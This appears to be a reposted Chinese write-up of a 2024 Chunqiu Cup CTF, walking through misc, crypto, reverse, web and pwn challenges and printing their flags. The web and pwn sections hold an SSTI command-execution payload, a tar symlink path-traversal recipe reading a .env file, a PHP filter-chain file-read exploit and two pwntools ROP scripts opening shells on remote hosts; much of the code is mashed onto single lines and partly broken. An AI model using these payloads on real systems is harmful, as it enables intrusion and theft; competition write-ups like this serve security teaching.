2024春秋杯day1 WP

admin 2025年2月12日23:07:08评论14 views字数 5025阅读16分45秒阅读模式

Misc

See anything in these pics?

爆破压缩包,密码是5FIVE

Foremost提取出来一张黑色的png

2024春秋杯day1 WP

然后爆破宽高,我用的是https://github.com/AabyssZG/Deformed-Image-Restorer

2024春秋杯day1 WP

2024春秋杯day1 WP

2024春秋杯day1 WP

简单镜像提取

使用神秘小工具一键导出所有文件

2024春秋杯day1 WP

出来一个zip,解压得到img,用rrstudio恢复之后得到一个xls,打开得到flagflag{E7A10C15E26AA5750070EF756AAA1F7C}

压力大,写个脚本吧

用下面的脚本直接批量解压

import zipfileimport osimport base64current_dir = os.getcwd()for i inrange(990, -1):password_file = os.path.join(current_dir, f"password_{i}.txt")zip_file = os.path.join(current_dir, f"zip_{i}.zip")withopen(password_file, "r"as f:encoded_password = f.read().strip()password = base64.b64decode(encoded_password).decode("utf-8")  #with zipfile.ZipFile(zip_file) as zf:zf.extractall(path=current_dir, pwd=password.encode("utf-8"))

然后合并全部txt,删掉最后的FGFGFG,再base64解码,最后16进制转图片得到一个二维码

https://rd.wechat.com/qrcode/confirm?block_type=101&content=flag%7B%5FPASSWORDs%5Fis%5Ffl%40g%21%5F%7D

2024春秋杯day1 WP

简单算术

异或

2024春秋杯day1 WP

Crypto

你是小哈斯?

Sha1,直接爆破就行,我驯服GPT写的

4a0a19218e082a343a1b17e5333409af9d98f0f5 => f07c342be6e560e7f43842e2e21b774e61d85f047 => l86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a54fd1711209fb1c0781092374132c66e79e2241b => g60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 => {54fd1711209fb1c0781092374132c66e79e2241b => g86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a6b0d31c0d563223024da45691584643ac78c96e8 => m58e6b3a414a1e090dfc6029add0f3555ccba127f => e53a0acfad59379b3e050338bf9f23cfc172ee787 => _84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c22ea1c649c82946aa6e479e1ffd321e4a318b1b0 => qe9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 => b53a0acfad59379b3e050338bf9f23cfc172ee787 => _042dc4512fa3d391c5170cf3aa61e6a638f84342 => ia0f1490a20d0211c997b44bc357e1972deab8ae3 => s042dc4512fa3d391c5170cf3aa61e6a638f84342 => ia0f1490a20d0211c997b44bc357e1972deab8ae3 => s53a0acfad59379b3e050338bf9f23cfc172ee787 => _84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c11f6ad8ec52a2984abaafd7c3b516503785c2072 => x95cb0bfd2977c761298d9624e4b4d4c72a39974a => y395df8f7c51f007019cb30201c49e884b46b92fa => zc2b7df6201fdd3362399091f0a29550df3505b6a => }

flag{game_cqb_isis_cxyz}

通往哈希的旅程

ca12fd8250972ec363a16593356abb1f3cf3a16d

cmd5花重金买的

18876011645

Reverse

Ezgo

爆破即可,最后密码是oadi,密码正确以后zip中的txt就可读了(有时候会失败,要重新解压重新输入密码,貌似2025也可以,应该算个非预期(?))

2024春秋杯day1 WP

Web

file_copy

直接用

https://github.com/synacktiv/php_filter_chains_oracle_exploit

python3 filters_chain_oracle_exploit.py --target url --file '/flag' --parameter path

这个只能在linux下跑,windows会报错,且Linux回显很慢

2024春秋杯day1 WP

easy_flask

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/flag').read() }}

ssti注入(希望出题人声明flag位置,我/flag读不到 env也没有差点破防了)

2024春秋杯day1 WP

Gotar

Tar路径穿越

先软连接构造一个恶意tar

mkdir 1

cd 1

ln -s ../../../.env 2

cd ../

tar -cf 3.tar 1

上传3.tar,得到真正的密钥,如下:

SfaVqVGfLOKk7Gp912kPe0Li47AEQM4iYNbBx1WVrWA=

token,是个jwt

2024春秋杯day1 WP

然后直接塞hackbar并读取flag

2024春秋杯day1 WP
2024春秋杯day1 WP
Hacker!!!Is_secret!!!(迫真jwt_secret)

Pwn

Gender_Simulation

from pwn import *binary = './pwn'elf = ELF(binary)libc = ELF('./libc.so.6')context.log_level = 'debug'context.arch = elf.archcontext.terminal = ['tmux''neww']send = lambda data: io.send(data)send_after = lambda delim, data: io.sendafter(delim, data)send_line = lambda data: io.sendline(data)send_line_after = lambda delim, data: io.sendlineafter(delim, data)recv = lambda num_bytes=4096: io.recv(num_bytes)recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)u32 = lambda data: u32(data.ljust(4b'x00'))u64 = lambda data: u64(data.ljust(8b'x00'))interactive = lambda: io.interactive()io = remote('39.106.48.123'38698)recv_until(b'A gift: ')leaked_addr = int(recv_until(b'n'), 16)libc_base = leaked_addr - libc.sym.setvbuflog.info(f"libc_base = {hex(libc_base)}")recv_until(b'Choose onen1. Boyn2. Girln')send_line(b'2')recv_until(b'2. Tomboyn')send_line(b'2')recv_until(b'certificaten')pop_rdi = libc_base + 0x000000000010f75bret_addr = 0x000000000040201asystem_addr = libc.sym.system + libc_basebin_sh_addr = next(libc.search(b'/bin/sh')) + libc_basesend_line(p64(0x0004025E6))recv_until(b'If you think you')send(b'a' * 0x18 + p64(pop_rdi) + p64(bin_sh_addr) + p64(ret_addr) + p64(system_addr))interactive()

Bypass

from pwn import *import timelocal_file = './pwn'elf = ELF(local_file)libc = ELF('./libc.so.6')context.log_level = 'debug'context.arch = elf.archcontext.terminal = ['tmux''neww']send = lambda data: io.send(data)send_after = lambda delim, data: io.sendafter(delim, data)send_line = lambda data: io.sendline(data)send_line_after = lambda delim, data: io.sendlineafter(delim, data)recv = lambda numb=4096: io.recv(numb)recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)unpack32 = lambda data: u32(data.ljust(4b'x00'))unpack64 = lambda data: u64(data.ljust(8b'x00'))get_qword = lambda data: (~np.uint64(data) + 1)get_dword = lambda data: (~np.uint32(data) + 1)defget_shell():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))info_address = lambda tag, addr: io.info(tag + '==>' + ': {:#x}'.format(addr))interact = lambda: io.interactive()io = remote('8.147.132.32'39949)send(p8(2) * 4)recv_until('d')recv_until('n')libc_base = unpack64(recv(6)) - libc.sym.putssend(p8(0) * 4)one_gadget = 0x4f302send(b'KEY: ' + b'a' * 19 + p8(0x14) + p8(0x2) + b'c' * 8 + p64(one_gadget + libc_base))time.sleep(0.1)send(b'VAL: ' + b'b' * 512)interact()

团队官网:https://www.hdsec.cn/

我们在https://www.hdsec.cn/tools/intranet/intranet.html收集了大量渗透中会用到的命令,欢迎各位师傅使用

原文始发于微信公众号(黄豆安全实验室):2024春秋杯day1 WP

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月12日23:07:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2024春秋杯day1 WPhttps://cn-sec.com/archives/3641891.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息